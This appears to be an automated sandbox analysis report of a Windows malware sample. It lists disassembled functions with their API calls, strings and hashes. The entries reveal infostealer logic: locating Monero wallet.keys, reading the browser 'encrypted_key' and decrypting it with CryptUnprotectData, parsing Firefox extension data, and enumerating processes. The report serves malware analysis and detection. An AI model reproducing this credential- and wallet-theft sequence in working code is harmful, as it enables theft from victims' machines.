Opcode ID: 0c20da33ac309938d89b87ba8dddd83f57b095c9366e7e55ae0dff98289f9079
Instruction ID: e55ee232c768d23729f0aed6f9d23a58d51fe0c5375c7a4cc405c077e623ce25
Opcode Fuzzy Hash: 0c20da33ac309938d89b87ba8dddd83f57b095c9366e7e55ae0dff98289f9079
Instruction Fuzzy Hash: 6C01E6B9A41208BBEB04DFD4EC4DFAEB7B8EB48701F108155FA05D7280DA759A419F51

Function 0004A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(00CE8A20,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 0004A0BD
LoadLibraryA.KERNEL32(00CED270), ref: 0004A146

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 0005A820: lstrlen.KERNEL32(00044F05,?,?,00044F05,00060DDE), ref: 0005A82B
Part of subcall function 0005A820: lstrcpy.KERNEL32(00060DDE,00000000), ref: 0005A885

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

SetEnvironmentVariableA.KERNEL32(00CE8A20,00000000,00000000,?,000612D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00060AFE), ref: 0004A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0004A0B2, 0004A0C6, 0004A0DC

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-4027016359
Opcode ID: d588a4bd618acd59d266c5caaa6204118a9d672b4daf4bf367fdce9bef777893
Instruction ID: 052019553dbb042f1a41382262abd172b629ddd77a7d7b1b8393f54f8383b582
Opcode Fuzzy Hash: d588a4bd618acd59d266c5caaa6204118a9d672b4daf4bf367fdce9bef777893
Instruction Fuzzy Hash: F84142B99031149FEF05DF64FD49BEA33B8BB09301F04012AE905931A5EF785995CB53

Function 0004A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

Part of subcall function 00058B60: GetSystemTime.KERNEL32(00060E1A,00CE9808,000605AE,?,?,000413F9,?,0000001A,00060E1A,00000000,?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 00058B86

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0004A2E1
lstrlen.KERNEL32(00000000,00000000), ref: 0004A3FF
lstrlen.KERNEL32(00000000), ref: 0004A6BC

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

DeleteFileA.KERNEL32(00000000), ref: 0004A743

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: d523ebda2a60518eda81aba2d7a58229906537cbb9e2b02bdb12540deea53d51
Instruction ID: 47a2fa00515ae13c429c38bea5d66ee52880349722eaff716f58100bb64d57ef
Opcode Fuzzy Hash: d523ebda2a60518eda81aba2d7a58229906537cbb9e2b02bdb12540deea53d51
Instruction Fuzzy Hash: 1AE1DF72A101189ADB04EBA4DC96EEF733CBF15301F508269F91776092EF346A4DCB66

Function 0004D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

Part of subcall function 00058B60: GetSystemTime.KERNEL32(00060E1A,00CE9808,000605AE,?,?,000413F9,?,0000001A,00060E1A,00000000,?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 00058B86

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0004D801
lstrlen.KERNEL32(00000000), ref: 0004D99F
lstrlen.KERNEL32(00000000), ref: 0004D9B3
DeleteFileA.KERNEL32(00000000), ref: 0004DA32

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: b74fc6da15f4d8b18996e31e3c1910b671d5ecab11794a762df02c94903c17e1
Instruction ID: 39bd45f2bbe75beebc8eda8c7239c33526edc92cb69e4c4c16cc852b6d4dc8b7
Opcode Fuzzy Hash: b74fc6da15f4d8b18996e31e3c1910b671d5ecab11794a762df02c94903c17e1
Instruction Fuzzy Hash: 5781DE76A101189ADB04FBA4DC96EEF7339BF15301F504629F907A6093EF346A0DCB62

Function 0004F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

Part of subcall function 000499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000499EC
Part of subcall function 000499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00049A11
Part of subcall function 000499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00049A31
Part of subcall function 000499C0: ReadFile.KERNEL32(000000FF,?,00000000,0004148F,00000000), ref: 00049A5A
Part of subcall function 000499C0: LocalFree.KERNEL32(0004148F), ref: 00049A90
Part of subcall function 000499C0: CloseHandle.KERNEL32(000000FF), ref: 00049A9A

Part of subcall function 00058E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00058E52

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00061580,00060D92), ref: 0004F54C
lstrlen.KERNEL32(00000000), ref: 0004F56B

Strings

^userContextId=4294967295, xrefs: 0004F59C
moz-extension+++, xrefs: 0004F5AD

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: e0918cfa7b2fed8eeaa4c57c0a908594c2ac184d956e8b53c24faff97652c4c1
Instruction ID: 8706c5c0c0f6c67feda9b9ee6ee363eac23c6c3da4657c77d95173013620f34b
Opcode Fuzzy Hash: e0918cfa7b2fed8eeaa4c57c0a908594c2ac184d956e8b53c24faff97652c4c1
Instruction Fuzzy Hash: 91511271E10108AADB04FBA4DC56DFF7779AF55301F408628FD16A7192EE346A0DCBA2

Function 00049CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 000499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000499EC
Part of subcall function 000499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00049A11
Part of subcall function 000499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00049A31
Part of subcall function 000499C0: ReadFile.KERNEL32(000000FF,?,00000000,0004148F,00000000), ref: 00049A5A
Part of subcall function 000499C0: LocalFree.KERNEL32(0004148F), ref: 00049A90
Part of subcall function 000499C0: CloseHandle.KERNEL32(000000FF), ref: 00049A9A

Part of subcall function 00058E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00058E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00049D39

Part of subcall function 00049AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00044EEE,00000000,00000000), ref: 00049AEF
Part of subcall function 00049AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00044EEE,00000000,?), ref: 00049B01
Part of subcall function 00049AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00044EEE,00000000,00000000), ref: 00049B2A
Part of subcall function 00049AC0: LocalFree.KERNEL32(?,?,?,?,00044EEE,00000000,?), ref: 00049B3F

Part of subcall function 00049B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00049B84
Part of subcall function 00049B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00049BA3
Part of subcall function 00049B60: LocalFree.KERNEL32(?), ref: 00049BD3

Strings

, xrefs: 00049DC1
"encrypted_key":", xrefs: 00049D30
DPAPI, xrefs: 00049D89

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: 35f1bba64d4bf3dafb5c7482788e29e55b233543071b69306ed87b21a422a16e
Instruction ID: 310ae5302bf6b21ac3ac4315c6c5484cb5dc0dcd946c62e7e98887acfcbd6879
Opcode Fuzzy Hash: 35f1bba64d4bf3dafb5c7482788e29e55b233543071b69306ed87b21a422a16e
Instruction Fuzzy Hash: FD3132B5D10209ABCF14DFE4DC85AEFB7B9BF48304F144539E905A7242EB349A14CBA5

Function 00058680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,000605B7), ref: 000586CA
Process32First.KERNEL32(?,00000128), ref: 000586DE
Process32Next.KERNEL32(?,00000128), ref: 000586F3

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

CloseHandle.KERNEL32(?), ref: 00058761

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: a66bf8e29c0d1ab4883fc78a3bd6b727c83c6b47aeda361a7290e76c248adf99
Instruction ID: 64a6d2ee41efbf75e9e1a5a4167e4f7066ff96ef386ffe2235a5e65449f2d727
Opcode Fuzzy Hash: a66bf8e29c0d1ab4883fc78a3bd6b727c83c6b47aeda361a7290e76c248adf99
Instruction Fuzzy Hash: DE314F71A01118ABDB24DF54DC45FEFB778FB49701F104299E90AA6191DF306A49CFA1

